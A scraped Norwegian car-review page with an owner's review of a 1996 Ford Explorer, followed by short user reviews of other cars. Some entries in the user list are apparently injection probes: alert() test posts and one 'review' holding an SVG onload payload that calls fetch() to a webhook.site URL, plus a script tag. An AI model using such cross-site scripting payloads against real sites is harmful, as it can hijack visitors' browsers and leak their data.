TV 2 Play
Min konto
TV 2 Play
Min konto

Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
1996 Ford Explorer Stasjonsvogn 6

Score 6.8/10

Bilen lar seg ikke hacke eller overvåke/spore. Det betyr færre persondata på avveie. At rimelige kvalitetsdeler er godt tilgjengelig på nett fra utlandet så vel som fra norske bilopphuggere, hjelper når man regner på totalkostnadene. Muligheten til å fikse mye selv (hvis man vil) og at de fleste mekanikere kan skru på en så enkel bil, inngir til en viss frihetsfølelse. Bilen er derimot tørst og man må regne med å gjøre noen investeringer i vedlikehold og fiks, samt. et lite delelager for et fullgodt og problemfritt bilhold. Spesielt hvis man som meg, ser for seg å bruke bilen i et evighetens perspektiv.

Kjøreglede

7 / 10
Explorer med 4.0l V6 OHV-motor og automatgir er ikke sportsmaskin. Men med pen og dannet kjørestil koser jeg meg når jeg kjører bilen. Blandingen av det noe rustikke pickup-utgangspunktet og amerikansk SUV-komfort, gjør at jeg alltid gleder meg til å kjøre. Automatic Ride Control bak (justerer automatisk høyden bak, etter hvor mye bagasje du har lastet).

Kvalitet/driftssikkerhet

7 / 10
Fravær av touchskjerm, GPS, eSIM, filholderassistent, parkeringssensorer, kamera og lidar - og en lang liste øvrige sensorer og computere, gjør at denne bilen blir veldig solid. ABS-sensor bak vil typisk være en sensor å rengjøre eller bytte av og til, men bilen bare går og går. Girkassen sies å være bilens svake punkt, så skifter olje litt oftere og vurderer en ekstern kjøler. Vi byttet ut en moderne 2020-Ford Explorer og en 2020-Jeep med denne 1996-modellen og ser oss aldri mer tilbake! Vedlikehold er dog viktig, enkelt å få tak i deler på nett og Ford-merkeverksted gjør en glimrende jobb med å følge opp bilen. Veldig robust lakk i forhold til moderne biler.

Plass/praktiske løsninger

8 / 10
Veldig god bagasjeplass, god plass i baksetene, kan trekke mye hengervekt og en familie på fem kan faktisk ha med bagasje (nyttelast), i motsetning til mange store elbiler. Store koppholdere fremme men små lommer i dørene.

Økonomi/kostnader

8 / 10
Bilen er underpriset på bruktmarkedet og det gir et brukbart økonomisk utgangspunkt men over lang tid vil bensinkostnadene spise opp besparelsen over nyere brukte biler (kapitalkostnad, alternativkostnad). Uten at jeg har sjekket nøye, bruker bilen over literen på mila. Fyller kun E5/98 oktan uten etanol for sikkerhetsskyld. Bryr meg ikke om bensinkostnadene. Bilen er enkel å fikse på selv og de fleste mekanikere bør enkelt kunne jobbe med bilen, noe som medfører mindre trøbbel og heft. Slipper å vente i et halvt år på deler og delene er velig rimelige, selv kvalitetsdeler fra Motorcraft eller tilsvarende/bedre. En hovedlykt koster noen hundrelapper, ikke 40 000... Rimelig å forsikre, snart veteranbil (lavere trafikkforsikringsavgift).

Drivstoff/forbruk

4 / 10
Bilen er tørst. For et langvarig bilhold ville jeg ikke rutinemessig fylt etanolholdig bensin, selv om det er mulig. Det innebærer gjerne påfylling av E5/98 oktan på Shell/ST1 eller muligens ESSO. Man eier bilen for alle andre grunner enn å spare bensin.

Flere vurderinger

Renault 5 E-Tech (2025)

Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te

Score 8.4

Vurdert av Knut

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996

Ford Explorer EV (2025)

Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.

Score 8.2

Vurdert av Adams

Ford Kuga (2021)

Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring

Score 8.6

Vurdert av Viggo

Hongqi E-HS9 (2022)

Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!

Score 8.2

Vurdert av MrP85

Mercedes-Benz EQC (2022)

Topp komfort og driftsikker.

Score 9.4

Vurdert av Renna

Polestar 2 (2022)

God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h

Score 8.8

Vurdert av Autofilen

Mercedes-Benz GLE (2020)

Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km

Score 9.6

Vurdert av Hans